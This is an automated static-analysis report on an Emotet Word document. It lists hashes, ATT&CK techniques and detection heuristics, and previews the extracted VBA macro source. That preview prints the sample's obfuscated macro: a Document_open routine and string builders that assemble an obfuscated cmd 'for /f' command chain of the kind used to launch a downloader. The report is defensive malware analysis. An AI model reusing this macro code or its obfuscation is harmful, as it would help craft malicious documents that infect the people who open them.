Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4b4f55aca8fa70dd…

MALICIOUS

Office (OLE)

Size: 166.0 KB · Created: 2018-07-16 01:58:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: 3ebb5887d9b1d403fbe054b1a20550ee
SHA-1: e4280f731dec943060a00b61a1738b6660e527db
SHA-256: 4b4f55aca8fa70ddeea24ca24dff1be0a07f1f26741d852baa13134e7d7fe93c
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro, which is automatically executed, uses the Shell() function to run a command. This behavior is characteristic of Emotet, a known downloader family. The ClamAV detection further supports this classification. The VBA script's primary function appears to be executing a command, likely to download and run a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7057690-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7057690-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 30298 bytes
SHA-256: 8eea49a5bbe7b5c9fcea306975c14fbfdffa6d201f6bb77f80d2f6f6eaf09f0e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "vaCXZbAHEXf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qFDYiGliZO()
   qtVuo = (11400 + uMQjs - 59206 - aPvCL * 95619 - AoJJo)
   DjJdi = (95643 + SCzfc - 64179 - IuluiQ * 84764 - hvUovz)
   YJkBI = (45637 + VBGTjJ - 65448 - DFEMZ * 94832 - EwqSib)
   XVKcw = (24737 + KCZJUs - 65995 - BNYOwh * 92661 - hVZCO)
   AKpwR = (73171 + ailKC - 70559 - wjRpSS * 47525 - nDKlF)
   BMwrbK = (34710 + qvvbr - 18056 - YmwRS * 51810 - kWibz)
   jJWNiO = (49401 + qBwIn - 70172 - UmvhI * 56592 - NXtTqE)
End Function
Function FkwQFcv()
   liOZK = (9697 + zWzkK - 61768 - DoZZiW * 59115 - uXrfJ)
   UThrDw = (79269 + GVBZmh - 69602 - wBKSLC * 24116 - KWjkri)
   WNCiCT = (54375 + NNSDdw - 84719 - Kjsdw * 26605 - RGhjhN)
   MAlwE = (22292 + FiUqj - 62031 - cmDhY * 18731 - CVAcli)
End Function
Private Sub Document_open()
On Error Resume Next
   vfRuOv = (39777 + iLodN - 37862 - FsckzN * 39398 - jniww)
   UpJYXc = (98251 + LbzlK - 22172 - EcDcM * 7017 - qzAWH)
   csEsuw = (39950 + HzFtp - 68985 - jPScDk * 64696 - iEzJR)
GuqEinGMVm = Application.Run("ZZiQYFLYjj", "" + UccQvfq + wwurnjpDC + CVar("c") + tXWiaLlH + VuJKUAlDsaCjTB + CzZVzr + MmEkZnJ + FzKBMlPs + azbXqnWR + UNaBGwTJM + LLczwAlGnf + dAVpTTDG + vWQrjnZlih + ViZEMDdO + OikPECJUYfu + tsvvAaBRM + VTAitCo + ZtCWurNIfS)
   YLquY = (41005 + vmDLuu - 69223 - pAAjaQ * 6343 - qfzoMm)
End Sub
Function wBzIJoUhzHmW()
   wZFLq = (34138 + DIZJk - 98287 - YzbtU * 13288 - Wcrih)
   HIWUi = (90296 + sGzGQ - 54366 - KYtAXw * 1293 - ILjXw)
   UrjVwl = (46492 + FNwmmp - 3105 - AAMEI * 24956 - qcsow)
   znOcEZ = (82440 + GChutM - 48542 - bKrVom * 96413 - JPEzL)
   WjVjjc = (97884 + BFjLl - 43558 - VaRVw * 23225 - zNfHbp)
   wVzGM = (84803 + XBTfmz - 82003 - HrjUI * 26041 - XGMpL)
   cKRXI = (60017 + plVhzP - 53127 - cIlSZz * 85289 - SfMfwb)
End Function


Attribute VB_Name = "YBIWzJH"
Function CzZVzr()
On Error Resume Next
sSqFd = 60264 + 59665 * qpUST - CFRiYl / aMOFk + sKrWI - oaWIQ + SMWjkR * 13496 - EVQLhw - 89806 + 45285
   rIzpF = 84465 + 69136 * uuhKYw - jOrFns / cYzmB + zPPjUi - hNSpzW + zrXWZ * 73624 - MAXWc - 23919 + 40501
WfmEfXfw = CStr(Chr(UjPnTufIRfLz + EuQfmwN + 109 + mTJzaFvUD + qsUwjoJmfO)) + "d /" + CStr(Chr(JDtZMiZNVzNcUK + CVLHkmM + 99 + UzwmbrEfZz + jiqiBCtircWt)) + " F" + "^oR  ," + "  ;  " + "/^f" + " ; " + CStr(Chr(KCwJWqhzsiba + IzuKzXW + 34 + dikThhrdEh + BjPcEzjqLDbI)) + "  del" + "i" + CStr(Chr(uhLuhNXiVb + zRABWtCXGR + 109 + uXpwIaHciLnK + ziJTKoqj)) + "s"
AtQmrw = 37001 + 23291 * fVfzB - GYfucz / rKXtjo + GQJQj - rCZih + FqOjp * 36972 - npVsW - 56754 + 59146
KpZcCzQqjO = "=nZa" + "4F" + "H to" + "kens= " + "  +2" + " " + CStr(Chr(pKhhFQOcC + KXaauUJsndqjLu + 34 + nGqrNXZHz + WNzLHpKoGj)) + " ;  " + "%n"
dYpZbO = 42450 + 26233 * oSwZl - dDGXzP / OjdVOU + QdKSH - HKzzoD + diZKr * 2630 - vbazz - 29131 + 86776
   PzSiz = 18804 + 27167 * OQkCE - ANLrHd / haWAWl + mnCOp - KhOlFj + XbCZll * 43354 - JRntYf - 64258 + 43812
CKLsslrC = " ; ; " + "^" + "IN ," + " " + "( ,"
CIwMZa = 41309 + 32852 * NtrRT - qoEVC / TivOUw + AWRDC - kNURzR + MOGWNF * 36454 - LpXQz - 73197 + 67090
   FzBzrL = 15332 + 61873 * JTSGH - trGjHS / NBUoCL + sjzBA - pBamWR + ZrzdVT * 31059 - XmdBd - 54224 + 72732
ZFpjOhpzJT = " ; " + " '  , " + ", ^^f^" + "^TY"
ABcCCC = 71670 + 19100 * HAEKRv - ZSsdiu / wOabfD + qsUEm - ScHdmb + QpOIu * 57244 - EijUL - 12647 + 48760
   EiBRjw = 80930 + 80568 * jvVWE - YiEcY / PdAoj + nEKBoU - uncvf + jXkjY * 81631 - TLZHi - 94454 + 53507
surthDLLFNB = "pe ; " + " , ^| " + ";" + " ^^Fi" + "nd " + "," + " " + CStr(Chr(UhoMlwaVn + bVLllmw + 34 + BumfqSiuAFR + qWKZLoIXXloKVp)) + CStr(Chr(ZCIQQOZ + VTQjUiQY + 109 + paMbKKFdJwU + mqbDIOicwQQ)) + "dFi" + CStr(Chr(srCDXlpKGd + wFKkQvoArdp + 34 + HKBCsKvkpRN + aifSfNO)) + " ;" + " ; '" + " , ; )" + "  ; ; "
CzZVzr = WfmEfXfw + KpZcCzQqjO + CKLsslrC + ZFpjOhpzJT
... (truncated)